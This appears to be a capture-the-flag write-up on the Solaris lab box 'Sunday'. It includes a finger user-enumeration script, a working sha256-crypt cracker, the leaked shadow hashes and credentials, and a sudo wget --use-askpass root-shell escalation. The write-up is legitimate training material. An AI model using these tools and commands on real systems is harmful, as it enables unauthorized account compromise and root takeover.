Sundays

TelBo_on published on
2 min, 328 words

Categories: OSCP

Recon

Ports

nmap -sT -A  -p79,111,515,6787,22022 10.129.203.178                                                                                                                  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 15:48 CST    
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 15:49 (0:00:00 remaining)        
Nmap scan report for 10.129.203.178                                  
Host is up (0.11s latency).                                          
                                                                   
PORT      STATE SERVICE VERSION                                      
79/tcp    open  finger?                                              
|_finger: No one logged on\x0D                                       
| fingerprint-strings:                                               
|   GenericLines:                                                    
|     No one logged on                                               
|   GetRequest:                                                      
|     Login Name TTY Idle When Where                                 
|     HTTP/1.0 ???                                                   
|   HTTPOptions:                                                     
|     Login Name TTY Idle When Where                                 
|     HTTP/1.0 ???                                                   
|     OPTIONS ???                                                    
|   Help:                                                            
|     Login Name TTY Idle When Where                                 
|     HELP ???                                                       
|   RTSPRequest:                                                     
|     Login Name TTY Idle When Where                                 
|     OPTIONS ???                                                    
|     RTSP/1.0 ???                                                   
|   SSLSessionReq, TerminalServerCookie:                             
|_    Login Name TTY Idle When Where                                 
111/tcp   open  rpcbind                                              
515/tcp   open  printer                                              
6787/tcp  open  http    Apache httpd                                 
|_http-title: 400 Bad Request                                        
|_http-server-header: Apache                                         
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0) 

Several unusual ports are exposed: 79, 515, 6787 and 22022 (the last one is SSH on a non-standard port). Port 6787 is the web-based administration interface introduced in Oracle Solaris 11; it requires credentials to log in. Port 79 is finger, which lets us enumerate accounts and see who is or was logged in. The enumeration script I used produces rather unclear output (below), so it is worth writing your own.

admin@10.129.203.178: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..dhcpserv DHCP Configuration A               < .  .  .  . >..ikeuser  IKE Admin                          < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
root@10.129.203.178: root     Super-User            console      <Dec  7, 2023>..
access@10.129.203.178: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
sammy@10.129.203.178: sammy           ???            ssh          <May  6 07:37> 10.10.14.68         ..
7777777@10.129.203.178: Login       Name               TTY         Idle    When    Where..pkg5srv  pkg(7) server UID                  < .  .  .  . >..
777777@10.129.203.178: Login       Name               TTY         Idle    When    Where..pkg5srv  pkg(7) server UID                  < .  .  .  . >..
777@10.129.203.178: Login       Name               TTY         Idle    When    Where..pkg5srv  pkg(7) server UID                  < .  .  .  . >..
sunny@10.129.203.178: sunny           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
bin@10.129.203.178: bin             ???                         < .  .  .  . >..
7777@10.129.203.178: Login       Name               TTY         Idle    When    Where..pkg5srv  pkg(7) server UID                  < .  .  .  . >..
network@10.129.203.178: Login       Name               TTY         Idle    When    Where..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..
nobody@10.129.203.178: nobody   NFS Anonymous Access               < .  .  .  . >..
77777777@10.129.203.178: Login       Name               TTY         Idle    When    Where..pkg5srv  pkg(7) server UID                  < .  .  .  . >..
77777@10.129.203.178: Login       Name               TTY         Idle    When    Where..pkg5srv  pkg(7) server UID                  < .  .  .  . >..
Admin@10.129.203.178: Admin                 < .  .  .  . >..
films+pic+galeries@10.129.203.178: Login       Name               TTY         Idle 

Judging by the entries whose TTY is ssh, the target users are sammy and sunny. There is nothing else useful here.
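A minimal finger enumerator of the kind suggested above, written here as an added example (it is not the script used in this writeup and not part of the original post). It speaks RFC 1288 directly (send the name followed by CRLF to port 79, read until the server closes the connection) and parses Solaris's "Login Name TTY Idle When Where" layout so that logins with a TTY such as ssh or console are separated from service accounts. The sample reply, the file name finger_enum.py and the wordlist argument are assumptions for illustration.

```python
import re
import socket
import sys

# Constructed sample reply in Solaris finger format, modelled on the output
# above; it is not a capture from the target.
SAMPLE_REPLY = (
    "Login       Name               TTY         Idle    When    Where\r\n"
    "sammy           ???            ssh          <May  6 07:37> 10.10.14.68\r\n"
    "root     Super-User            console      <Dec  7, 2023>\r\n"
    "adm      Admin                              < .  .  .  . >\r\n"
)

# TTY values Solaris prints for a session; they sit right before the <idle/when> field.
_TTY_RE = re.compile(r"\b(ssh|console|pts/\d+)\s*$")


def finger_query(host, user, port=79, timeout=5.0):
    """Send one RFC 1288 query ("<user>" + CRLF) and return the reply as text."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"{user}\r\n".encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:          # server closes the connection after the reply
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_finger_reply(reply):
    """Return [(login, tty, where)] for every user line of a Solaris finger reply.

    The Name column is padded and may contain spaces, so the TTY is located by
    pattern just before the '<...>' idle/when field rather than by column
    offset. tty and where are None for accounts without a session.
    """
    users = []
    for line in reply.splitlines():
        line = line.rstrip()
        if not line or line.startswith("Login ") or "No one logged on" in line:
            continue
        login = line.split()[0]
        head, _, tail = line.partition("<")
        m = _TTY_RE.search(head)
        tty = m.group(1) if m else None
        where = tail.partition(">")[2].strip() or None
        users.append((login, tty, where))
    return users


def enumerate_users(host, candidates, port=79):
    """Query each candidate name and collect every login the server reports.

    Solaris finger also substring-matches the Name column (a query for
    'network' returns netadm and netcfg), so every login in a reply is kept,
    not only exact matches on the queried string.
    """
    found = {}
    for name in candidates:
        try:
            reply = finger_query(host, name, port)
        except OSError:           # refused / timed out: skip this candidate
            continue
        for login, tty, where in parse_finger_reply(reply):
            found[login] = (tty, where)
    return found


def active_logins(found):
    """Logins that have (or had) an interactive session: first targets for password guessing."""
    return sorted(login for login, (tty, _) in found.items() if tty)


if __name__ == "__main__":
    # usage: python3 finger_enum.py <host> <wordlist>   (file name is an assumption)
    host, wordlist = sys.argv[1], sys.argv[2]
    with open(wordlist) as fh:
        names = [ln.strip() for ln in fh if ln.strip()]
    users = enumerate_users(host, names)
    for login, (tty, where) in sorted(users.items()):
        print(f"{login:<12} tty={tty or '-':<8} from={where or '-'}")
    print("interactive:", ", ".join(active_logins(users)))
```

Run it as python3 finger_enum.py 10.129.203.178 names.txt. Because Solaris finger also matches the Name column as a substring, feeding it words like admin or network pulls in netadm, netcfg and friends even when no account has that exact login, which is why the parser records every login that comes back rather than only exact hits.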

A dead end

Since port 6787 had not been used for anything yet, I tried to guess its version and look for matching CVEs. From a CSS path I guessed version 9.0.0:

<link rel="stylesheet" href="/solaris/js/jet/css/libs/oj/v9.0.0/alta/oj-alta.css" type="text/css" />

Searching turned up CVE-2020-14871, but unfortunately I could not exploit it (my guess is that the box was patched later). Note also that the v9.0.0 in that path is the version of the Oracle JET (oj) front-end library bundled with the web UI, not the Solaris release, so it says nothing about which patches the host has.

User and Root

No luck there, so the only remaining option was to guess user passwords. After many attempts I obtained the credentials sunny:sunday. Logging in over SSH (port 22022 on this host) and looking at the home directory, the .bash_history file had not been cleared:

cat /home/sunny/.bash_history
su -
su -
cat /etc/resolv.conf 
su -
ps auxwww|grep overwrite
su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
sudo /root/troll
sudo /root/troll
su -
sudo -l
sudo /root/troll
ps auxwww
ps auxwww
ps auxwww
top
top
top
ps auxwww|grep overwrite
su -
su -
cat /etc/resolv.conf 
ps auxwww|grep over
sudo -l
sudo /root/troll
sudo /root/troll
sudo /root/troll
sudo /root/troll

The history points at a /backup/shadow.backup file, which turns out to be readable and contains:

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
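What hashcat -m 7400 does with those two lines, as an added example rather than anything from the original post: a pure-Python sha256-crypt (the $5$ scheme from Drepper's specification, which is what Solaris 11 and glibc store in shadow) used to check a small constructed wordlist against the shadow.backup entries. The hashes are the ones shown above; the wordlist and all function names are assumptions for illustration.

```python
import hashlib

# The two shadow(4) lines from above, copied here so the example runs offline.
SHADOW_BACKUP = """\
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""
# Constructed wordlist (an assumption for the example).
WORDLIST = ["password", "sunday", "Sunday1", "cooldude!"]

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Byte permutation used when encoding the final digest (from the specification).
_OUT_ORDER = [(0, 10, 20), (21, 1, 11), (12, 22, 2), (3, 13, 23), (24, 4, 14),
              (15, 25, 5), (6, 16, 26), (27, 7, 17), (18, 28, 8), (9, 19, 29)]


def _b64_24bit(b2, b1, b0, n):
    """crypt(3)-style base64: emit n characters, low 6 bits first, from a 24-bit word."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = ""
    for _ in range(n):
        out += _ITOA64[w & 0x3F]
        w >>= 6
    return out


def sha256crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """Drepper's sha256-crypt ($5$): salted, 5000-round-by-default SHA-256."""
    salt = salt[:16]                      # the scheme caps the salt at 16 bytes
    plen, slen = len(password), len(salt)
    # digest B = SHA256(password + salt + password)
    b = hashlib.sha256(password + salt + password).digest()
    # digest A: password, salt, B repeated to the password length, then one of
    # B / password per bit of the password length (lowest bit first)
    a = hashlib.sha256(password + salt)
    a.update(b * (plen // 32) + b[: plen % 32])
    i = plen
    while i > 0:
        a.update(b if i & 1 else password)
        i >>= 1
    a = a.digest()
    # P: password-derived bytes of password length
    dp = hashlib.sha256(password * plen).digest()
    p = (dp * (plen // 32 + 1))[:plen]
    # S: salt-derived bytes of salt length, with 16 + A[0] salt repetitions
    ds = hashlib.sha256(salt * (16 + a[0])).digest()
    s = (ds * (slen // 32 + 1))[:slen]
    # the cost loop: what makes each guess expensive
    c = a
    for r in range(rounds):
        h = hashlib.sha256()
        h.update(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    enc = "".join(_b64_24bit(c[x], c[y], c[z], 4) for x, y, z in _OUT_ORDER)
    enc += _b64_24bit(0, c[31], c[30], 3)
    prefix = "$5$" if rounds == 5000 else f"$5$rounds={rounds}$"
    return f"{prefix}{salt.decode()}${enc}"


def verify(password: str, shadow_hash: str) -> bool:
    """Recompute the hash for one candidate and compare it with a $5$ shadow field."""
    parts = shadow_hash.split("$")        # ['', '5', ['rounds=N',] salt, hash]
    if len(parts) < 4 or parts[1] != "5":
        raise ValueError("not a sha256-crypt hash")
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        del parts[2]
    salt, expected = parts[2], parts[3]
    computed = sha256crypt(password.encode(), salt.encode(), rounds)
    return computed.rsplit("$", 1)[1] == expected


def crack_shadow(shadow_text: str, wordlist) -> dict:
    """Try every wordlist entry against every $5$ line of a shadow(4) dump."""
    hits = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[1].startswith("$5$"):
            continue                      # locked, empty or non-sha256crypt entry
        user, shadow_hash = fields[0], fields[1]
        for candidate in wordlist:
            if verify(candidate, shadow_hash):
                hits[user] = candidate
                break
    return hits


if __name__ == "__main__":
    for user, pw in crack_shadow(SHADOW_BACKUP, WORDLIST).items():
        print(f"{user}:{pw}")
```

This is far too slow to replace hashcat for anything beyond a handful of candidates (5000 SHA-256 rounds per guess, in Python), but it shows exactly what the cracker recomputes: the salt and round count come from the hash itself, so a readable shadow copy hands an attacker everything needed for an offline attack, and only the entropy of the password stands in the way.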

Cracking it with hashcat (mode 7400, sha256crypt / $5$) recovers sammy's password:

$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

Checking sudo rights as sammy:

bash-5.1$ sudo -l
User sammy may run the following commands on sunday:
    (root) NOPASSWD: /usr/bin/wget

Privilege escalation follows the wget entry from GTFOBins: wget runs the program named by --use-askpass to obtain a username and password for the URL (0 is just a placeholder URL), and under sudo that program runs as root. wget reads the helper's standard output through a pipe, so the helper redirects its shell's stdout to stdin (1>&0), i.e. back to the terminal, to keep the root shell interactive:

sammy@sunday:/home/sammy$ TF=$(mktemp)
sammy@sunday:/home/sammy$ chmod +x $TF
sammy@sunday:/home/sammy$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sammy@sunday:/home/sammy$ sudo -u root wget --use-askpass=$TF 0
root@sunday:/home/sammy# whoami
root

Summary

User enumeration over the finger protocol on port 79, followed by weak-password guessing against the enumerated users, gives the foothold. A readable shadow backup and a NOPASSWD sudo rule for wget, a binary that can execute other programs, then lead to root. A sudo rule like that is equivalent to granting root outright; if wget really must be allowed, sudo's NOEXEC tag (effective only for dynamically linked binaries) would at least stop it from spawning the askpass helper.